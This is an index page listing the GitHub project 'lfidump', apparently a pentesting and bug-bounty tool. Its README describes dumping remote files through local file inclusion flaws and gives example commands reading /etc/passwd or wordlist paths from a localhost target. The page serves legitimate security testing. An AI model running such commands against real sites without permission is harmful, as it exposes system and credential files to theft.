Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/p0dalirius/lfidump
A simple Python script to dump remote files through a local file read or local file inclusion web vulnerability.
- Host: GitHub
- URL: https://github.com/p0dalirius/lfidump
- Owner: p0dalirius
- Created: 2022-02-01T11:37:13.000Z (almost 3 years ago)
- Default Branch: master
- Last Pushed: 2024-03-16T08:21:05.000Z (8 months ago)
- Last Synced: 2024-05-01T17:26:42.721Z (7 months ago)
- Topics: bugbounty, dump, file, inclusion, local, pentesting
- Language: Python
- Homepage: https://podalirius.net/
- Size: 1.33 MB
- Stars: 61
- Watchers: 4
- Forks: 13
- Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
README
![](./.github/banner.png)
A simple Python script to dump remote files through a local file read or local file inclusion web vulnerability.
![](./.github/example.gif)
## Features
- [x] Dump a single file with `-f /path/to/remote/file.txt`
- [x] Dump lots of files from a wordlist with `-F /path/to/local/wordlist.txt`
- [x] Insecure mode (for broken SSL/TLS) with `-k/--insecure`
- [x] Custom local dump dir with `-D/--dump-dir`

## Usage
```
$ ./LFIDump.py -h
usage: LFIDump.py [-h] [-v] [-s] -u URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode. (default: False)
  -s, --only-success    Only print successful read file attempts.
  -u URL, --url URL     URL to connect to. (example: http://localhost/?page=LFIPATH)
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
```

## Examples
+ Dump a single file
```
./LFIDump.py -u "http://localhost:8000/lfi.php?page=LFIPATH" -f /etc/passwd
```
+ Dump files from a wordlist
```
./LFIDump.py -u "http://localhost:8000/lfi.php?page=LFIPATH" -F ./wordlists/all.txt
```

## Contributing
Pull requests are welcome. Feel free to open an issue if you want to add other features.